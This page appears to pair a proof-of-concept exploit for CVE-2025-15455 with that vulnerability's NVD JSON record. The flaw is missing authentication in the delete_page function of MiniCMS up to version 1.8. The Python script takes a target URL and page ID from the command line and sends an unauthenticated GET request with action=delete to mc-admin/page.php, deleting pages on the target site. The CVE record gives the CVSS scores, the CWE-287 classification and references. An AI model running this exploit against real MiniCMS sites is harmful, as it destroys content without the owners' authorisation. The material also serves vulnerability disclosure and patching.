CVE-2025-15455

import requests import sys # CVE-2025-15455 PoC - MiniCMS Authentication Bypass in delete_page # Target: MiniCMS <= 1.8 # Component: /minicms/mc-admin/page.php delete_page function def exploit(target_url, page_id): """ Exploit for MiniCMS delete_page improper authentication vulnerability. This PoC demonstrates how an unauthenticated attacker can delete pages. Args: target_url: Base URL of the vulnerable MiniCMS installation page_id: ID of the page to delete Returns: bool: True if deletion appears successful, False otherwise """ # Construct the delete page endpoint delete_endpoint = f"{target_url.rstrip('/')}/minicms/mc-admin/page.php" # Prepare the malicious request # The delete_page function doesn't validate authentication params = { 'action': 'delete', 'id': page_id } print(f"[*] Target: {target_url}") print(f"[*] Attempting to delete page ID: {page_id}") print(f"[*] Sending request to: {delete_endpoint}") try: # Send the request without any authentication # PR:N (No Privileges Required) - this is the vulnerability response = requests.get(delete_endpoint, params=params, timeout=10) print(f"[*] Response Status: {response.status_code}") # Check for indicators of successful deletion if response.status_code == 200: # Analyze response content if 'success' in response.text.lower() or 'deleted' in response.text.lower(): print("[+] Page deletion appears successful!") return True elif 'error' in response.text.lower() or 'fail' in response.text.lower(): print("[-] Server returned an error message") return False else: # Response received but content unclear print("[!] Request completed but result uncertain") return None else: print(f"[-] Unexpected HTTP status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return False def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-15455.py <target_url> <page_id>") print("Example: python cve-2025-15455.py http://target.com/minicms 1") sys.exit(1) target = sys.argv[1] page_id = sys.argv[2] result = exploit(target, page_id) if result is True: print("\n[!] Vulnerability confirmed - authentication bypass successful") sys.exit(0) else: print("\n[-] Exploitation may have failed") sys.exit(1) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-15455", "sourceIdentifier": "[email protected]", "published": "2026-01-05T04:15:41.600", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in bg5sbk MiniCMS up to 1.8. Impacted is the function delete_page of the file /minicms/mc-admin/page.php of the component File Recovery Request Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "baseScore": 6.4, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:1234n:minicms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.8", "matchCriteriaId": "BF8A0973-9280-4D64-8535-D2F7A88E613E"}]}]}], "references": [{"url": "https://github.com/ueh1013/VULN/issues/14", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339488", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339488", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725137", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}